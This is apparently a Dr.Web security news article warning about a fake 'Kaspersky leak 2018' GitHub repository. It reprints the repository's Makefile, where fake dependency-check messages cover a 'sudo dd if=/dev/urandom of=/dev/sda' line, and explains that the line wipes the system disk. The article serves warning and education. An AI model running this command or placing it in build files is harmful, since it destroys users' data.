Your browser is obsolete!

The page may not load correctly.

  • add to favourites
    Add to Bookmarks

Another cause for deception

Read: 486 Comments: 3 Rating: 9

Scammers can take advantage of virtually any publicised event—one readily available option they have is to mount an email phishing campaign. Sometimes they go too far in their trickery.

In early 2018, a news story appeared about source code being leaked from an anti-virus company.

Today, a news post about a Kaspersky Lab source code leak was published on the Mash Telegram channel. According to the publication, a company employee had been downloading pieces of anti-virus source code for quite some time, and in November 2017, he published the data on GitHub.

https://geektimes.ru/post/298619/

The anti-virus developer promptly negotiated the deletion of the leaked source code, but this story was too interesting to pass by for some people! Some con artists were quick to come up with their own version of the code.

A GitHub repository named “Kaspersky leak 2018” contained a Makefile with the following code:

all:
echo Check depends…
echo Install depends…
sudo dd if=/dev/urandom of=/dev/sda

What does it do? The lines starting with the word echo output messages that appear in the terminal window in which the script was launched; they indicate whether all the required packages are present in the system and install any missing packages. But the fourth line is used to write random data (the dd command) to the sda device – most likely, the main disk in the system. This command’s execution will result in all of your data being destroyed.

Some users claim that:

This is not some nasty trick but the most reliable technique for getting rid of all the malicious code on /dev/sda.

But the Anti-virus Times doesn't advocate curing headaches by chopping off heads!

Seriously though, this leak proves that anti-virus companies don't create viruses. Otherwise, a former disgruntled anti-virus company employee would have already put some compelling evidence on public display.

Dr.Web recommends

Be careful not to run any file you come across on the Internet!

On 15.01.2018, our chief accountant's computer was infected after she opened a document attached to an email message (“Acts_pending_revision); all the files on the hard drive were subsequently encrypted. Because all of our accounting databases were stored on the computer, our company's accounting business routines have been brought to a halt.

A request submitted to Doctor Web's Technical Support Service

Rate this issue and receive Dr.Weblings! (1 vote = 1 Dr.Webling)

Sign in and get 10 Dr.Weblings for sharing the link to this issue via social media.

[Twitter]

Unfortunately, due to Facebook's technical limitations, Dr.Weblings cannot be awarded. However, you can share this link with your friends for free.

Tell us what you think

Leave your comment on the day of publication and get 10 Dr.Weblings, or get 1 Dr.Webling for a comment posted any other day. Comments are published automatically and are reviewed by a moderator. Rules for leaving comments about Doctor Web news items.

To leave a comment, you need to log in under your Doctor Web site account. If you don't have an account yet, you can create one.

Comments